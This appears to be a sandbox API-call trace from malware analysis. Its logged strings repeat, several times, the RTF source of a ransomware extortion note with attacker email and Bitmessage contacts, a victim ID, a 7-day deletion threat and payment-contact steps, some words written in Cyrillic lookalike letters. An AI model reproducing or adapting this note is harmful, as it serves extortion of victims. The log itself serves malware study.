w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.383] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.383] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2468d38, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 